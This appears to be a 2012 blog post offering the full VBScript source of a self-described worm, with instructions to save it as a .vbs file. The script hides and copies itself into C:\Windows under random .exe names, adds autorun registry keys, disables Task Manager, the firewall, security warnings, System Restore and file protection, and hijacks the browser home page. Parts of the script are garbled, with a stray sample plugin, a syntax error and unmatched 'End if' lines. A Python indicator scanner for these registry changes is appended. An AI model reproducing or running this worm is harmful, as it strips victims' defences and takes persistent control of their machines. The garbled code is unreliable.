Friday, 31 August 2012

New Worm Called Monaco

Recently I have been working on a worm which affects the entire registry and disables Task Manager. If you execute this worm, your home page will be my blog http://theethicalhackerz.blogspot.com.



Be careful: do not run this worm. If you run this worm, your home page will be my blog :D
Hehe...
On Error Resume Next

' monaco By 315cu1t V.
set fso=CreateObject("Scripting.FileSystemObject")
set shell=CreateObject("Wscript.Shell")

Function Hide(filename)
Set file = fso.GetFile(filename)
file.Attributes = -2
End Function
hide(WScript.ScriptFullName)
path = "C:\windows\mfxjla.exe"
fso.CopyFile Wscript.ScriptFullName,path
hide(path)
Shell.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Sasaxquo", "C:\Windows\mfxjla.exe"
path = "C:\windows\zhuchj.exe"
fso.CopyFile Wscript.ScriptFullName,path
hide(path)
Shell.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Saszoqor", "C:\Windows\zhuchj.exe, "REG_SZ"
path = "C:\Windows\eojyhnzad.exe"
fso.CopyFile Wscript.ScriptFullName,path
hide(path)
Shell.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\eojyhnzad", path, "REG_SZ"
Shell.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"

Shell.regwrite "HKLM\Software\Microsoft\Internet Explorer\Main\Start Page","http://theethicalhackerz.blogspot.com", "REG_SZ"
Shell.regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://theethicalhackerz.blogspot.com", "REG_SZ"
Shell.regwrite "HKCU\Software\Microsoft\Security Center\FirewallDisableNotify", "1", "REG_DWORD"
Shell.regwrite "HKCU\Software\Microsoft\Security Center\UpdatesDisableNotify", "1", "REG_DWORD"
Shell.regwrite "HKCU\Software\Microsoft\Security Center\AntiVirusDisableNotify", "1", "REG_DWORD"
Shell.regwrite "HKLM\Software\Microsoft\Security Center\FirewallDisableNotify", "1", "REG_DWORD"
Shell.regwrite "HKLM\Software\Microsoft\Security Center\UpdatesDisableNotify", "1", "REG_DWORD"
Shell.regwrite "HKLM\Software\Microsoft\Security Center\AntiVirusDisableNotify", "1", "REG_DWORD"
Shell.regwrite "HKCU\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile\EnableFirewall","0","REG_DWORD"
Shell.regwrite "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile\EnableFirewall","0","REG_DWORD"
Shell.regwrite "HKCU\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile\EnableFirewall","0","REG_DWORD"
Shell.regwrite "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile\EnableFirewall","0","REG_DWORD"
Shell.run "",false
Shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR","1", "REG_DWORD"
Shell.regwrite "HKLM\SYSTEM\CurrentControlSet\Services\sr","4", "REG_DWORD"
Shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable","FFFFFF9D","REG_DWORD"
' Sample Plugin File
' This plugin is an example. Use it to guide you when making your own plugins

msgtitle = "Alert" ' Set The Message Box Title
msgtext = "hi there" 'Set The Message Box Text

Call MsgBox(msgtext,65,msgtitle)

' :-------:
Shell.RegWrite("HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictAnonymous", "1", REG_DWORD)
Shell.RegWrite("HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\PasswordExpiryWarning", "0", "REG_DWORD")
End if
End if

Now save the file with .vbs extension.
That's it!! 
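From the defender's side, the registry writes in the script above double as host indicators. The following is an added example, not part of the original post: it scans the text of a `reg export` dump for those values. The sample dump and the "executable directly in C:\Windows" autorun heuristic are constructed assumptions.

```python
import re

# Values the script on this page writes, keyed by registry path without the hive
# (it writes most of them under both HKLM and HKCU), with the tampered setting.
TAMPER = {
    r"software\microsoft\windows\currentversion\policies\system": {"disabletaskmgr": 1},
    r"software\microsoft\security center": {
        "firewalldisablenotify": 1, "updatesdisablenotify": 1, "antivirusdisablenotify": 1},
    r"software\policies\microsoft\windowsfirewall\domainprofile": {"enablefirewall": 0},
    r"software\policies\microsoft\windowsfirewall\standardprofile": {"enablefirewall": 0},
    r"software\microsoft\windows nt\currentversion\systemrestore": {"disablesr": 1},
}
RUN_KEYS = {r"software\microsoft\windows\currentversion\run",
            r"software\microsoft\windows\currentversion\runservices"}
# Heuristic (assumption): autorun target is an .exe sitting directly in the Windows folder.
DROPPED = re.compile(r"c:\\windows\\[^\\]+\.exe$", re.I)

# Constructed sample in "reg export" text format, not taken from a real host.
SAMPLE = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Sasaxquo"="C:\\Windows\\mfxjla.exe"
"Updater"="C:\\Windows\\System32\\updater.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]
"EnableFirewall"=dword:00000001
'''

def scan(reg_text):
    """Return (key, value name, data) for each entry matching the page's indicators."""
    findings, hive, key = [], None, None
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            hive, _, key = line[1:-1].partition("\\")
            key = key.lower()
            continue
        m = re.match(r'"([^"]+)"=(.*)$', line)
        if not m or key is None:
            continue
        name, raw = m.groups()
        if key in RUN_KEYS and raw.startswith('"'):
            target = raw.strip('"').replace("\\\\", "\\")
            if DROPPED.match(target):
                findings.append((f"{hive}\\{key}", name, target))
        elif raw.startswith("dword:"):
            value = int(raw[6:], 16)
            if TAMPER.get(key, {}).get(name.lower()) == value:
                findings.append((f"{hive}\\{key}", name, value))
    return findings
```

Calling `scan(SAMPLE)` flags the `Sasaxquo` autorun and the `DisableTaskMgr` policy, and leaves the System32 autorun and the enabled firewall policy alone. Legitimate programs in C:\Windows (for example explorer.exe) can also match the autorun heuristic, so treat hits as leads to review.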
